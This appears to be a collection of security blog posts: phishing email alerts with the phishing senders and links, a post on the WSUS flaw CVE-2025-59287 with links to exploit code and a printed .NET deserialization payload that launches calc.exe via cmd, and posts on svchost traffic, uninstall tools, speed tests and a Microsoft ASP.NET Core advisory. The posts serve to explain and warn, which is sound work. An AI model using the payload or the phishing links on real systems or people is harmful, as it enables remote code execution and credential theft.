Shoppers Drug Mart Phishing email with subject Shoppers Drug Mart Loyalty Program

For the record, this is general Shoppers Drug Mart phishing email attempt that is recently going around, with subject "Shoppers Drug Mart Loyalty Program" What to do?  Report them, go to bottom of page. 

From : Shoppers <maybell.idalinepw@sedfhgv.shopmys.best> Subject : Shoppers Drug Mart Loyalty Program identified this email as spam

PHISHING LINKs;

1. Hover over image
https://click.convertkit-mail2.com/xxxxx/xxx/xxx#xxxxx

How to tell this is a Phishing email ?

1. Check email address in full, if it's not from originating company then it's phishing.
2. Hover over all links in email, if it's not from the company's website then forget it.
3. The best way is to view source message; end examine the source location and emails links are from the domain claimed.

How to examine Email Message Source ?

Now let's look at message source

1. Outlook.com->Actions->View Message Source. 
2. Gmail.com->More (down arrow to top right)->Show original.

Check for suspicious links, anything that does not originate from the domain.

Report Phishing Email (not as Spam)

1. Outlook.com->Junk (at Top)->Phishing Scam
2. Gmail.com->More (down-arrow to top right)->Report Phishing 

Report Phishing

If you have received this email, take further 

1. https://www.google.com/safebrowsing/report_phish/

Report phishing at Microsoft and government agencies

1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

PoC code for Microsoft Windows Server Update Services (WSUS) attack CVE-2025-59287

CVE-2025-59287 is a critical RCE vulnerability in Microsoft Windows Server Update Services (WSUS), caused by unsafe deserialization of AuthorizationCookie data through BinaryFormatter in the EncryptionHelper.DecryptData() method. The vulnerability allows an unauthenticated attacker to achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint. Permanent mitigation requires replacing BinaryFormatter with secure serialization mechanisms, implementing strict type validation, and enforcing proper input sanitization on all cookie data.

PoC code below, excellent article

CVE-2025-59287 WSUS Unauthenticated RCE | HawkTrace

PayloadsAllTheThings/Insecure Deserialization/DotNET.md at master · swisskyrepo/PayloadsAllTheThings (github.com)

dexterm300/cve-2025-59287-exploit-poc: Exploitation proof-of-concept for CVE-2025-59287 - a critical vulnerability in the Windows Server Update Service (WSUS) caused by the deserialization of untrusted data. This flaw allows an unauthorized attacker to execute arbitrary code over a network, posing a significant security risk. (github.com)

ObjectDataProvider verwendet (www-cnblogs-com.translate.goog)

dotnet-deserialization/XmlSerializer.md at main · Y4er/dotnet-deserialization (github.com)

.NET Deserialization Exploitation Chain: A Beginner's Guide - XmlSerializer - FreeBuf Network Security Portal (www-freebuf-com.translate.goog)

Poc Decode Payload running calc.exe

<Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35
 Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties
.ForegroundBrush=Black><?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c calc" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>

National Bank phishing email with subject Tax Residency Verification - Mandatory Renewal of Form

For the record, this is a National Bank phishing email attempt that is recently going around, with subject "Tax Residency Verification — Mandatory Renewal of Form"

What to do?  

Report them, goto bottom of page. 

From : helpdesk@griolk.com Subject : Tax Residency Verification — Mandatory Renewal of Form

PHISHING LINKs;

1. https://nbdb-entryt.com/?token=xxxxxxxxxxxxxxxxxx

How to tell this is a Phishing email ?

1. Check email address in full, if it's not from originating company then it's phishing.
2. Hover over images and all links in email, if it's not from the company's website then forget it. 

How to examine Email Message Source?

Now let's look at message source

1. Outlook.com->Actions->View Message Source. 
2. Gmail.com->More (down arrow to top right)->Show original.

Check for suspicious links, anything that does not originate from the domain.

Report Phishing Email (not as Spam)

1. Outlook.com->Junk (at Top)->Phishing Scam
2. Gmail.com->More (down-arrow to top right)->Report Phishing 

Report Phishing

If you have received this email take further 

1. https://www.google.com/safebrowsing/report_phish/

Report phishing at Microsoft and government agencies

1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Windows - How to check svchost.exe outgoing connections to external DNS servers other than my local DNS

How to check svchost.exe connecting to remote addresses effectively. 

I use a tool from Nirsoft that makes this easy using LiveTcpUdpWatch - View TCP/UDP network activity of every application on Windows (nirsoft.net)

Process ID	Process Name	Protocol	Local Port	Local Address	Remote Port	Remote Port Name	Remote Address	Received Bytes	Sent Bytes	Received Packets	Sent Packets	Receive Speed	Send Speed	Connect Time	Disconnect Time	Accept Time	Connections Count	Disconnect Count	Process Path	ASN	Remote IP Country	Organization	Remote IP	Remote Host Name
1672	svchost.exe	UDP IPv6	5355	ff02::1:3	49911		fe80::d4a5:1562:817:1350	48		2									C:\Windows\System32\svchost.exe				fe80::d4a5:1562:817:1350

Let's now to examine the remote address fe80::d4a5:1562:817:1350, we right-click on the line and choose



You have to get IPNetInfo: Retrieve IP Address Information from WHOIS servers (nirsoft.net) and install it in same directory, say something like C:\Program Files (x86)\Nirsoft

With the following window below, text extracted and we see it connect to IANA for DNS Server.

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
#


NetRange:       FE80:: - FEBF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
CIDR:           FE80::/10
NetName:        IANA-LINK-LOCAL-UNICAST
NetHandle:      NET6-FE80-1
Parent:          ()
NetType:        IANA Special Use
OriginAS:       
Organization:   Internet Assigned Numbers Authority (IANA)
RegDate:        2022-02-26
Updated:        2024-05-24
Comment:        Link-Local Unicast [RFC4291]
Ref:            https://rdap.arin.net/registry/ip/FE80::



OrgName:        Internet Assigned Numbers Authority
OrgId:          IANA
Address:        12025 Waterfront Drive
Address:        Suite 300
City:           Los Angeles
StateProv:      CA
PostalCode:     90292
Country:        US
RegDate:        
Updated:        2024-05-24
Ref:            https://rdap.arin.net/registry/entity/IANA


OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName:   ICANN
OrgAbusePhone:  +1-310-301-5820 
OrgAbuseEmail:  abuse@iana.org
OrgAbuseRef:    https://rdap.arin.net/registry/entity/IANA-IP-ARIN

OrgTechHandle: IANA-IP-ARIN
OrgTechName:   ICANN
OrgTechPhone:  +1-310-301-5820 
OrgTechEmail:  abuse@iana.org
OrgTechRef:    https://rdap.arin.net/registry/entity/IANA-IP-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
#

AI Content

What is fe80::d4a5:1562:817:1350?

• This is a link-local IPv6 address, part of the fe80::/64 range.

• Link-local addresses are automatically assigned to network interfaces for communication within the same local network segment.

• They are not routable on the internet and are used for internal purposes like device discovery and service resolution.

Why is svchost.exe connecting to it?

• svchost.exe hosts many Windows services. In this case, it's likely handling:

  • LLMNR (Link-Local Multicast Name Resolution): Resolves names without DNS.

  • NDP (Neighbor Discovery Protocol): Detects other devices and configures network settings.

  • mDNS or SSDP: Service discovery protocols used by apps and devices.

These protocols use UDP over IPv6 to communicate with nearby devices using link-local addresses like fe80::d4a5:1562:817:1350.

🔐 Is this safe?

• Yes, this is normal behavior in IPv6-enabled networks.

• It’s part of how Windows discovers and interacts with other devices (printers, routers, etc.).

• If you're concerned about privacy or traffic:

  • You can disable unused IPv6 features or the IP Helper service.

  • Use tools like Wireshark or Process Explorer to monitor activity.

IANA server ? 

The connection to fe80::/64 by svchost.exe on Windows 7 is not to an IANA server—it’s a local link-local IPv6 address used for internal network communication.

Here's a breakdown of what’s happening and why:

What is fe80::/64?

• fe80::/64 is a reserved IPv6 address range for link-local communication.

• These addresses are automatically assigned to network interfaces and are only valid within the local network segment.

• They cannot be routed across the internet and are not associated with IANA servers or any external organization.

Why is svchost.exe connecting to it?

• svchost.exe is a generic host process that runs Windows services.

• In this case, it's likely hosting the IP Helper service (iphlpsvc), which supports IPv6 features like:

  • LLMNR (Link-Local Multicast Name Resolution) for name resolution without DNS

  • Neighbor Discovery Protocol (NDP) for detecting other devices on the local network

  • Multicast DNS (mDNS) or other service discovery protocols

These services use UDP over IPv6 to communicate with other devices on the same local network using link-local addresses like fe80::d4a5:1562:817:1350.

How to uninstall if installer is not there and checking for malware

There's a better way to uninstall programs that do not have an installer, and I recommend using Nirsoft's UninstallView. 

UninstallView - View installed applications on Windows 11 / 10 / 8 / 7 / Vista and optionally uninstall them (nirsoft.net)

UninstallView is a tool for Windows that collects information about all programs installed on your system and displays the details of the installed programs in one table, so you can interrogate the columns. 

Sorting my Publisher column to reveal empty publisher is a good way to check for malware.

Available Columns to sort by

Field	Description
Display Name	The official display name of the software (Stored in the Registry)
Registry Name	The name of the Registry key (under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall)
Display Version	The official display version of the software (Stored in the Registry)
Registry Time	The date/time that the Registry key of the software was modified
Install Date	The official install date of the software, stored in the Registry by the installer
Installed For	Indicates whether the software was installed for a specific user or all users
Install Location	The path of the folder where the software is installed
Install Folder Created Time	The creation date/time of the installation folder
Install Folder Modified Time	The modified date/time of the installation folder
Publisher	The creator of the software
Uninstall String	Full command to uninstall the software
Quiet Uninstall String	Full command to quietly uninstall the software
Change Install String	Full command to change the installation of the software
Comments	Comment about the software, stored in the uninstall Registry key
About URL	URL to the publisher's or application's home page
Update Info URL	URL used to update information on the application
Help Link	Internet address for technical support
Install Source	The folder that contained the installer files
Installer Name	Name of the installer used (e.g., Windows Installer, Inno Setup)
Release Type	Displays the release type of the software (e.g., Security Update)
Display Icon Path	Full path of the icon file
MSI Filename	Specifies the MSI filename (Windows Installer only)
Estimated Size	Estimated size of the software (from the Registry)
Attributes	Attributes stored in the uninstall Registry key (e.g., System Component)
Language	Language of the software (e.g., en-US)
Parent Key Name	Registry name of the parent uninstall item
Registry Key	Full path of the uninstall Registry key

Download UninstallView - View installed applications on Windows 11 / 10 / 8 / 7 / Vista and optionally uninstall them (nirsoft.net)

This will explore the below registry key for you.

For really technical removal you can explore the registry key path in the registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall

Improvement from my last post using free tool from Microsoft, but limited.

Metadata Consulting [dot] ca - Blog: How to remove problem, stuck or hidden software window using a free Microsoft tool

Cloud Storage Phishing email with subject Final Warning: Your Cloud Storage has reached its limit

For the record, this is general Cloud Storage  phishing email attempt that is recently going around, with subject "Final Warning: Your Cloud Storage has reached its limit" What to do?  Report them, goto bottom of page. 

From : CLoud_Notification<tyler.johnson232@prohibitionatl.com> Subject : Final Warning: Your Cloud Storage has reached its limit Outlook has identified this email as spam

PHISHING LINKs;

1. Hover over image
http://216.226.28.34.bc.googleusercontent.com/%dddddddddddd 

How to tell this is a Phishing email ?

1. Check email address in full, if it's not from originating company then it's phishing.
2. Hover over all links in email, if it's not from the company's website then forget it.
3. The best way is to view source message; end examine the source location and emails links are from the domain claimed.

How to examine Email Message Source ?

Now let's look at message source

1. Outlook.com->Actions->View Message Source. 
2. Gmail.com->More (down arrow to top right)->Show original.

Check for suspicious links, anything that does not originate from the domain.

Report Phishing Email (not as Spam)

1. Outlook.com->Junk (at Top)->Phishing Scam
2. Gmail.com->More (down-arrow to top right)->Report Phishing 

Report Phishing

If you have received this email, take further 

1. https://www.google.com/safebrowsing/report_phish/

Report phishing at Microsoft and government agencies

1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

MLab Internet Speed Test by Google - a more accurate internet speed test

⇨ MLab Internet Speed Test

Legacy Internet Speed Test Explained

Most internet speed tests base are based on traditional measurement of downloading a single stream (large file download). This is not a true representation of start/stop internet mixed traffic like your browser.

Most of us are most test internet speed while browsing sites.  A typical browser loads thousands of mini files (html, css, js, media files) when you visit a page. 

Now adays, even traditional single file videos streams are chunked into smaller pieces, so single file download test is outdated.  Below picture, are files loaded when watching a Youtube.com video. 

Enter, a modern traffic internet speed therefore was needed, enter M-Lab Tests - M-Lab (measurementlab.net)

Legacy Internet Speed Test

Speed test by Ookla (used by all internet providers) measures only continuous single stream (large file download) but is not a true representation of start/stop internet mixed traffic like your browser.

I am contracted with Rogers for 1.5Mbps Down, 50Mbps up, and this lines up conveniently, but my internet is slow. 

MLab Internet Speed Test is block internally byRogers Support, when I recently called technician about my slow internet! 
 

Modern Internet Speed Test

The Measurement Lab test sponsored by Google, uses mixed traffic. MSAK measures multi-stream traffic focused on throughput and latency, while NDT focuses on single-stream upload/download speeds and network diagnostics. MSAK is a more realistic internet traffic measurement.

Do ⇨ MLab Internet Speed Test

The MSAK test is more accurate load test that more accurately represents browsing websites. 

		NDT	MSAK
	Test Server	Toronto, CA	Toronto, CA
	Download	409.85 Mb/s	711.61 Mb/s
	Upload	17.36 Mb/s	5.87 Mb/s
	Latency	38 ms	20 ms
	Retransmission	0.23%	0.00%

Modern Internet Speed Test Explained

MSAK (Measurement Swiss-Army Knife)

MSAK is a measurement service hosted by M-Lab that implements two different test protocols:

• throughput: A configurable Websocket-based throughput measurement protocol capable of multi-stream tests. Its design is partially based on M-Lab’s single-stream measurement protocol, NDT. Configurable parameters currently include:
  • Number of streams
  • Congestion control algorithm
  • Test duration
  • Per-stream byte limit
• latency: A UDP-based latency measurement protocol.

This is measurement is more reflective of website browsing traffic.

NDT (Network Diagnostic Tool)

NDT is a single stream performance measurement of a connection’s capacity for “bulk transport” (as defined in IETF’s RFC 3148). NDT reports upload and download speeds and latency metrics.

This is more like a traditional test; a more technical test used to for diagnosing issues with the network. 

Copilot Comparison

🔍 Key Differences

Feature	MSAK	NDT
Measurement Type	Throughput (multi-stream) + Latency	Throughput (single-stream) + Diagnostics
Protocols Used	WebSocket (TCP), UDP	TCP (BBR, Cubic, Reno)
Configurability	High (streams, duration, CCA)	Low (standardized test)
Diagnostic Depth	Basic latency + throughput	Detailed TCP-level diagnostics
Target Audience	Researchers, engineers'	General users, policymakers

MSAK (Measurement Swiss-Army Knife)

Purpose: A flexible tool for measuring throughput and latency using configurable protocols.

• Throughput Test:

  • Uses a WebSocket-based protocol.

  • Supports multi-stream testing.

  • Configurable parameters include:

    • Number of streams

    • Congestion control algorithm

    • Test duration

    • Per-stream byte limits

• Latency Test:

  • Uses a UDP-based protocol to measure network latency.

• Use Case: Ideal for researchers or engineers needing customizable network performance tests across multiple dimensions (e.g., congestion control behavior, stream concurrency).

NDT (Network Diagnostic Tool)

Purpose: Measures single-stream performance for bulk data transport, focusing on upload/download speeds and latency.

• Metrics Reported:

  • Upload speed

  • Download speed

  • Latency (RTT)

  • Congestion indicators

  • TCP-level diagnostics (e.g., loss rate, retransmissions)

• Protocols:

  • ndt7: Uses TCP BBR or Cubic, operates over HTTP(S) ports.

  • ndt5: Legacy support using Cubic.

  • web100: Deprecated, used Reno TCP.

• Use Case: Best for users wanting a quick, standardized snapshot of their internet connection’s performance, especially for consumer advocacy or policy analysis.

How to fix ASP.NET Core Vulnerability HTTP request smuggling bug scores 9.9

• ASP.NET Core HTTP request smuggling bug scores 9.9
  
  
• ‘Highest Ever’ Severity Score Assigned by Microsoft to ASP.NET Core Vulnerability
  
  
• CVE-2025-55315 is an HTTP request smuggling bug leading to information leaks, file content tampering, and server crashes.

Microsoft fixes highest-severity ASP.NET Core flaw ever (bleepingcomputer.com)

What is HTTP request smuggling

How to fix the issue 

Microsoft Security Advisory CVE-2025-55315: .NET Security Feature Bypass Vulnerability · Issue #371 · dotnet/announcements (github.com) 

from above link for those without GitHub account

Microsoft Security Advisory CVE-2025-55315: .NET Security Feature Bypass Vulnerability

Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core 10.0 , ASP.NET Core 9.0 , ASP.NET Core 8.0, and ASP.NET Core 2.3. This advisory also provides guidance on what developers can do to update their applications to address this vulnerability.

Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.

Discussion

Discussion for this issue can be found at dotnet/aspnetcore#64033

Mitigation factors

Microsoft has not identified any mitigating factors for this vulnerability.

Affected software

• Any ASP.NET Core 10.0 application running on ASP.NET Core 10.0.0-rc.1.25451.107 or earlier.
• Any ASP.NET Core 9.0 application running on ASP.NET Core 9.0.9 or earlier.
• Any ASP.NET Core application running on ASP.NET Core 8.0.20 or earlier.
• Any ASP.NET Core 2.x application consuming the package Microsoft.AspNetCore.Server.Kestrel.Core version 2.3.0 or earlier.

Affected Packages

The vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below

Package name	Affected version	Patched version
Microsoft.AspNetCore.Server.Kestrel.Core	<= 2.3.0	2.3.6

ASP.NET Core 10

Package name	Affected version	Patched version
Microsoft.AspNetCore.App.Runtime.linux-arm	10.0.0-rc.1.25451.107	10.0.0-rc.2.25476.107
Microsoft.AspNetCore.App.Runtime.linux-arm64	10.0.0-rc.1.25451.107	10.0.0-rc.2.25476.107
Microsoft.AspNetCore.App.Runtime.linux-musl-arm	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.linux-musl-arm64	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.linux-musl-x64	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.linux-x64	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.osx-arm64	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.osx-x64	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.win-arm	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.win-arm64	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.win-x64	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.win-x86	10.0.0-rc.1.25451.107	10.0.0-rc.2.25502.107

ASP.NET Core 9

Package name	Affected version	Patched version
Microsoft.AspNetCore.App.Runtime.linux-arm	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.linux-arm64	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.linux-musl-arm	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.linux-musl-arm64	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.linux-musl-x64	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.linux-x64	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.osx-arm64	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.osx-x64	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.win-arm	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.win-arm64	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.win-x64	>= 9.0.0, <= 9.0.9	9.0.10
Microsoft.AspNetCore.App.Runtime.win-x86	>= 9.0.0, <= 9.0.9	9.0.10

ASP.NET Core 8

Package name	Affected version	Patched version
Microsoft.AspNetCore.App.Runtime.linux-arm	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.linux-arm64	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.linux-musl-arm	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.linux-musl-arm64	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.linux-musl-x64	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.linux-x64	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.osx-arm64	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.osx-x64	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.win-arm	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.win-arm64	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.win-x64	>= 8.0.0, <= 8.0.20	8.0.21
Microsoft.AspNetCore.App.Runtime.win-x86	>= 8.0.0, <= 8.0.20	8.0.21

Advisory FAQ

How do I know if I am affected?

If you have a runtime or SDK with a version listed, or an affected package listed in affected software or affected packages, you're exposed to the vulnerability.

How do I fix the issue?

1. To fix the issue please install the latest version of .NET 9.0 and .NET 8.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
2. If your application references the vulnerable package, update the package reference to the patched version.

• You can list the versions you have installed by running the < class="notranslate" style="background-color: var(--bgColor-neutral-muted, var(--color-neutral-muted)); border-radius: 6px; box-sizing: border-box; font-size: 11.9px; margin: 0px; padding: 0.2em 0.4em; tab-size: var(--tab-size-preference); white-space: break-spaces;">dotnet --info

 command. You will see output like the following;

.NET SDK:
 Version:           9.0.100
 Commit:            59db016f11
 Workload version:  9.0.100-manifests.3068a692
 MSBuild version:   17.12.7+5b8665660

Runtime Environment:
 OS Name:     Mac OS X
 OS Version:  15.2
 OS Platform: Darwin
 RID:         osx-arm64
 Base Path:   /usr/local/share/dotnet/sdk/9.0.100/

.NET workloads installed:
There are no installed workloads to display.
Configured to use loose manifests when installing new manifests.

Host:
  Version:      9.0.0
  Architecture: arm64
  Commit:       9d5a6a9aa4

.NET SDKs installed:
  9.0.100 [/usr/local/share/dotnet/sdk]

.NET runtimes installed:
  Microsoft.AspNetCore.App 9.0.0 [/usr/local/share/dotnet/shared/Microsoft.AspNetCore.App]
  Microsoft.NETCore.App 9.0.0 [/usr/local/share/dotnet/shared/Microsoft.NETCore.App]

Other architectures found:
  x64   [/usr/local/share/dotnet]
    registered at [/etc/dotnet/install_location_x64]

Environment variables:
  Not set

global.json file:
  Not found

Learn more:
  https://aka.ms/dotnet/info

Download .NET:
  https://aka.ms/dotnet/download

• If you're using .NET 8.0, you should download and install .NET 8.0.21 Runtime or .NET 8.0.318 SDK (for Visual Studio 2022 v17.10 latest update) from https://dotnet.microsoft.com/download/dotnet-core/8.0.

• If you're using .NET 9.0, you should download and install .NET 9.0.10 Runtime or .NET 9.0.111 SDK (for Visual Studio 2022 v17.12 latest update) from https://dotnet.microsoft.com/download/dotnet-core/9.0.

• If you're using .NET 10.0, you should download and install .NET 10.0.0-rc.2.25476.107 Runtime or .NET 10.0.100-rc.2.25476.107 SDK (for Visual Studio 2022 v17.12 latest update) from https://dotnet.microsoft.com/download/dotnet-core/10.0.

• If you're using Microsoft.AspNetCore.Server.Kestrel.Core nuget package, update to the latest version 2.3.6 using either of the following methods:

  • Using the NuGet Package Manager UI in Visual Studio:
    - Open your project in Visual Studio.
    - Right-click on your project in Solution Explorer and select "Manage NuGet Packages..." or navigate to "Project > Manage NuGet Packages".
    - In the NuGet Package Manager window, select the "Updates" tab. This tab lists packages with available updates from your configured package sources.
    - Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.
    - Click the "Update" button.

  • Using the NuGet Package Manager Console in Visual Studio:
    - Open your project in Visual Studio.
    - Navigate to "Tools > NuGet Package Manager > Package Manager Console".
    - To update a specific package to its latest version, use the Update-Package command:
    Code:

          Update-Package -Id Microsoft.AspNetCore.Server.Kestrel.Core
    

  • Using the .NET CLI (Command Line Interface):
    Open a terminal or command prompt in your project's directory.
    To update a specific package to its latest version:
    Code:

          dotnet add package Microsoft.AspNetCore.Server.Kestrel.Core
    

Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.

Additionally, if you've deployed self-contained applications targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.

Other Information

Reporting Security Issues

If you have found a potential security issue in .NET 8.0, .NET 9.0 or .NET 10.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.

Support

You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/aspnetcore. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.